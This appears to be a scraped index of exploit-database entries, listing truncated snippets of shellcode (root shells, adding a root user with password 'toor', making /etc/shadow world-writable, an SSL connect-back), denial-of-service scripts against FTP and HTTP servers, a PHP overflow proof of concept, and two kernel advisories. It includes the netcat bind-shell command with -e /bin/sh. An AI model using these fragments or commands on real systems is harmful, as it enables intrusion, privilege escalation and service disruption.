Linux/ARM - execve("/bin/sh","/bin/sh",0) - 30 bytes

No description provided by source. / Title: Linux/ARM - execve/bin/sh,/bin/sh,0 - 30 bytes Date: 2010-06-28 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Dtabase of shellcodes http://www.shell-storm.org/shellcode/ 8054:...

Linux/ARM - setuid(0) & execve("/bin/sh","/bin/sh",0) - 38 bytes

No description provided by source. / Title: Linux/ARM - setuid0 & execve/bin/sh,/bin/sh,0 - 38 bytes Date: 2010-06-29 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Dtabase of shellcodes http://www.shell-storm.org/shellcode/...

XM Easy Personal FTP Server <= 5.7.0 (NLST) DoS Exploit

No description provided by source. / XM Easy Personnal FTP Server = 5.7.0 Remote Denial of Service with Request NLST --------------------------------------------------------------------------------------------------------- The vulnerability is caused due to an error in handling the NLST command...

Linux/ARM - add root user with password - 151 bytes

No description provided by source. / Title: Linux/ARM - add root user with password - 151 bytes Date: 2010-11-25 Tested on: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan - twitter: @shellstorm http://shell-storm.org Informations: ------------- - user: shell-storm - pswd: toor - uid : 0 / include...

Linux/SuperH - sh4 - setuid(0) ; execve("/bin/sh", NULL, NULL) - 27 bytes

No description provided by source. / Linux/SuperH - sh4 - setuid0 ; execve/bin/sh, NULL, NULL - 27 bytes Tested on debian-sh4 2.6.32-5-sh7751r by Jonathan Salwan - twitter: @jonathansalwan 400054: 17 e3 mov 23,r3 400056: 4a 24 xor r4,r4 400058: 0b c3 trapa 11 40005a: 3a 23 xor r3,r3 40005c: 0b e3...

Zervit HTTP Server <= 0.3 (sockets++ crash) Remote Denial of Service

No description provided by source. !/usr/bin/perl Zervit HTTP Server = v0.3 Remote Denial of Service. -------------------------------------------------------------------- The vulnerability is caused due to an error in multi-socket. This can be exploited to crash the HTTP service...

linux/x86 Shellcode Polymorphic chmod("/etc/shadow",666) 54 bytes

No description provided by source. / Title : Linux/x86 - Shellcode Polymorphic chmod/etc/shadow,666 & exit - 54 bytes Encode : ADD Author : Jonathan Salwan Mail : submit ! shell-storm.org ! Database of shellcodes = http://www.shell-storm.org/shellcode/ Informations chmod & exit:...

Xitami Web Server <= 5.0 - Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl Xitami HTTP Server = v5.0 Remote Denial of Service. ------------------------------------------------------------------------------ The vulnerability is caused due to an error with HEAD request and multi-socket This can be exploited to crash the HT...

Create a New User with UID 0 - ARM (Meta)

No description provided by source. Exploit Title: Linux/ARM - Create a new user with UID 0 MSF Date: 2010-11-25 Author: Jonathan Salwan - twitter @jonathansalwan Tested on: ARM926EJ-S rev 5 v5l Issue link: https://metasploit.com/redmine/issues/3254 This file is part of the Metasploit Framework an...

Solaris/x86 - Reboot() - 37 bytes

No description provided by source. / Title: Solaris/x86 - Reboot - 37 bytes Author: Jonathan Salwan submit!shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan Date: 2010-05-21 Tested: SunOS opensolaris 5.11 snv111b i86pc i386 i86pc Solaris !Database of...

Linux/x86-32 - ConnectBack with SSL connection - 422 bytes

No description provided by source. / Title: Linux/x86-32 - ConnectBack with SSL connection - 422 bytes Date: 2011-06-08 Tested on: ArchLinux i686 Author: Jonathan Salwan - twitter: @jonathansalwan http://shell-storm.org Configurations server...

Oracle Linux 5 / 6 : Unbreakable Enterprise Kernel (ELSA-2013-2585)

The remote Oracle Linux 5 / 6 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2013-2585 advisory. - afkey: fix info leaks in notify messages Mathias Krause Orabug: 17837974 CVE-2013-2234 - drivers/cdrom/cdrom.c: use kzalloc for failing hardware...

Unbreakable Enterprise Kernel security update

kernel-uek 2.6.32-400.33.3uek - afkey: fix info leaks in notify messages Mathias Krause Orabug: 17837974 CVE-2013-2234 - drivers/cdrom/cdrom.c: use kzalloc for failing hardware Jonathan Salwan Orabug: 17837971 CVE-2013-2164 - fs/compatioctl.c: VIDEOSETSPUPALETTE missing error check Kees Cook...

Linux/SuperH - sh4 - setuid(0) ; execve("/bin/sh", NULL, NULL) - 27 bytes

/ Linux/SuperH - sh4 - setuid0 ; execve"/bin/sh", NULL, NULL - 27 bytes Tested on debian-sh4 2.6.32-5-sh7751r by Jonathan Salwan - twitter: @jonathansalwan 400054: 17 e3 mov 23,r3 400056: 4a 24 xor r4,r4 400058: 0b c3 trapa 11 40005a: 3a 23 xor r3,r3 40005c: 0b e3 mov 11,r3 40005e: 02 c7 mova...

PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938

No description provided by source. ?php / Jonathan Salwan - @shellstorm http://shell-storm.org 2011-06-04 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938 Stack-based buffer overflow in the socketconnect function in ext/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow...

Linux/x86 - netcat bindshell port 6666 - 69 bytes

No description provided by source. / Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes Date: 2011-04-20 Author: Jonathan Salwan http://shell-storm.org http://twitter.com/!/shellstorm /usr/bin/netcat -ltp6666 -e/bin/sh 8048054 .text: 8048054: 31 c0 xor %eax,%eax 8048056: 50 push %eax 804805...

linux/x86 - netcat bindshell port 6666 - 69 bytes

/ Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes Date: 2011-04-20 Author: Jonathan Salwan http://shell-storm.org http://twitter.com/!/shellstorm /usr/bin/netcat -ltp6666 -e/bin/sh 8048054 : 8048054: 31 c0 xor %eax,%eax 8048056: 50 push %eax 8048057: 68 74 63 61 74 push $0x74616374...

Linux/x86 - netcat bindshell port 6666 - 69 bytes

Linux/x86 - netcat bindshell port 6666 - 69 bytes. Shellcode exploit for linux platform / Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes Date: 2011-04-20 Author: Jonathan Salwan http://shell-storm.org http://twitter.com/jonathansalwan /usr/bin/netcat -ltp6666 -e/bin/sh 8048054 : 8048054...

linux/ARM (Meta) Create a New User with UID 0

Exploit for linux/x86 platform in category shellcode ============================================= linux/ARM Meta Create a New User with UID 0 ============================================= Exploit Title: Linux/ARM - Create a new user with UID 0 MSF Date: 2010-11-25 Author: Jonathan Salwan - twitt...

Linux/ARM - execve"/bin/sh", 0, 0 vars 27 bytes

Linux/ARM - execve"/bin/sh", 0, 0 vars - 27 bytes. Shellcode exploit for arm platform / Title: Linux/ARM - execve"/bin/sh", 0, 0 vars - 27 bytes Date: 2010-08-31 Tested on: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan - twitter: @jonathansalwan shell-storm.org Shellcode ARM with not a 0x20, 0x0a...